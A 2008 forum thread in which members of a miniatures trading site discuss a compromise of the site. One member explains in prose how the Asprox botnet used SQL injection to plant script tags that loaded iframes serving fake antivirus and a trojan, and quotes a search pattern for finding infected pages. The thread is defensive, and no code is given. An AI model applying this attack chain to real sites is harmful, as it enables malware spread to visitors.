Forum Admin
Host
Sergeant
603 Posts
    
 | | 09/09/2008 2:22 PM |
| | I usually use firefox but I noticed last night that maxminis was not loading in IE. Looking closer, we were hacked again. In the past month, maxminis has had more than 47,000 hack attempts; apparently one succeeded. I updated the code to close the hole that I think the new attack is using. Please post here if you notice any more hack issues. Thanks! | |
| |
|
relientKitten
Warrior
179 Posts
Portland, Oregon
| | 09/09/2008 3:10 PM |
| Anyone who was using IE last night during this and does NOT have up-to-date AntiVirus software, please update and run it. The script was loading a fake spyware combined with at least one trojan (and believe me, it loaded quick on testing). The 'spyware' is called AntivirXP08; the trojan was just detected as a generic when caught by McAfee. AnarionZelle states that Norton picked it up as trojan.asprox which will turn your box into a proxy server for other malicious traffic.
Glad we're back up and running. Host++
| |
~relientKitten, Champion of Elenriel Annanole, Loremistress
>^..^<
Happy Customers: 17
Completed Trades: 22
Crochet Beholder: http://www.maxminis.com/Forums/tabid/104/forumid/68/postid/810379/view/topic/Default.aspx
Crochet Dice: http://www.maxminis.com/Forums/tabid/104/forumid/68/postid/807807/view/topic/Default.aspx
My trades, references, and flavrs: http://www.maxminis.com/Forums/tabid/104/forumid/53/postid/808880/view/topic/Default.aspx
My can-has-want-plz-trade list: http://www.maxminis.com/hw_list.asp user=relientKitten | |
|
E Thug of the
Round Table
Wolfgang
Warlord
5757 Posts
Milton, Ontario Canada
| | 09/09/2008 3:19 PM |
| | thats host your awsome!!!! | |
Proud member since March 26 2005
Champion of the SIVAK DRACONIAN
Completed trades: (86)
Bad traders(2) DJchuckles, sardal
Called shots:Sivak Draconian in DD
Trade References
Email Me | |
|
relientKitten
Warrior
179 Posts
Portland, Oregon
| | 09/09/2008 3:54 PM |
| Anarion++ for providing me with the info from Norton, I think I've put all of the pieces together.
Asprox is a botnet, converting infected machines into proxy servers than can then be used to redirect malicious traffic across the internet.
According to the original information from March when this botnet became high-scale, the folks behind Asprox began exploiting ASP (what MaxMinis happens to run on) in order to get their trojans into the mainstream.
They'll search Google for websites with ASP that match certain keywords and will then attack with the SQL Injection on those sites. This injection inserts a script block that runs a piece of javascript on another server. The particular javascript that we were subjected to had two functions. First, it checked to see if you had already been infected with a particular piece of spyware known as AntivirXP08. If you were, their works was already done and it stopped. Second, if you were not infected, it created a set of iframes that would then load a cgi script from the same server that the javascript came from. I didn't have the ability to get the cgi info, but my guess is that it redirected to another site that loaded the Asprox trojan (which is what the antivirus softwares were catching) and also loaded the AntivirXP08 so that it would not have to load the virii again (why have extra load on your infecting server ). I noticed a couple of different domains that it was continuously trying to load from, so there could have been a number of different virii.
http://www.scmagazineus.com/Asprox-botnet-malware-morphs/article/110169/
http://www.firestorm-online.com/trojans/asprox/
This might be useful for you, Host, regarding vulnerability searches in the ASP code (under Suggested Actions):
http://www.microsoft.com/technet/security/advisory/954462.mspx
I did the suggested Google search for finding infected sites... ("script src=http://*/""ngg.js"|"js.js"|"b.js") and there are at least 180k hits so we are certainly not the only ones that got smooshed.
| |
~relientKitten, Champion of Elenriel Annanole, Loremistress
>^..^<
Happy Customers: 17
Completed Trades: 22
Crochet Beholder: http://www.maxminis.com/Forums/tabid/104/forumid/68/postid/810379/view/topic/Default.aspx
Crochet Dice: http://www.maxminis.com/Forums/tabid/104/forumid/68/postid/807807/view/topic/Default.aspx
My trades, references, and flavrs: http://www.maxminis.com/Forums/tabid/104/forumid/53/postid/808880/view/topic/Default.aspx
My can-has-want-plz-trade list: http://www.maxminis.com/hw_list.asp user=relientKitten | |
|
Vrecknidj
Warlord
10445 Posts
United States
| | 09/09/2008 4:07 PM |
| Thanks everyone. Thanks to Host for taking care of this, thanks to relientKitten for emailing me, and thanks to others who emailed me as well.
Nice to see we're up and running again.
Dave | |
Knowledge Arcana editor issues 5-9, Phoenix Lore Magazine editor, assistant editor for Rite Publishing;
My Trade Thread and My Reference Thread; Winner of WBC IV, IX and XIII; Rule #0: bshugg is always right! | |
|
Sirohk
Commander
3930 Posts
USA
| | 09/10/2008 3:35 AM |
| Thanks.Â
Just a note - the excel button on the Have / Want list is not working since the hack. It gives an error when I try to save my H/W list.Â
Thanks.Â
| |
Sirohk, the Bard of Heartstone
Knight of the Rahshasa's
And Crusader of the Zakya, Ak'chazar, Naztharune, and Naityan Rakshasa's | |
|
Forum Admin
Host
Sergeant
603 Posts
| | 09/10/2008 1:29 PM |
| | we were down again for about an hour today, I took the have/want lists offline temporarily to see if they are the hole... | |
| |
|
NITRAM
Skirmisher
8 Posts
Canada
| | 09/15/2008 5:53 PM |
| | sorry to ask but, the have/want lists are still down or is it just my browser :-) | |
---------------------------------------------------------------------
At last we will reveal ourselfs to the jedi, at last we will have revenge (Darth Maul Ep1) | |
|
realmaster
Underboss
2010 Posts
Home of the 2002 Winter Olympics
| | 09/16/2008 10:13 PM |
| Posted By NITRAM on 09/15/2008 5:53 PM
sorry to ask but, the have/want lists are still down or is it just my browser :-)
still down. :( | |
Thanks, realmaster. Let's split up!!!!!
RIP Gary Gygax 1938-2008
Unhallowed vindicated champion: van richten
Successful trades:72
Trades in progress:0
Have issues with:1 burning_kazuki
Bad trades:0 | |
|
sonofrich
Skirmisher
10 Posts
York, Pa
| | 09/17/2008 6:40 PM |
| Any idea when this will be fixed  | | | |
|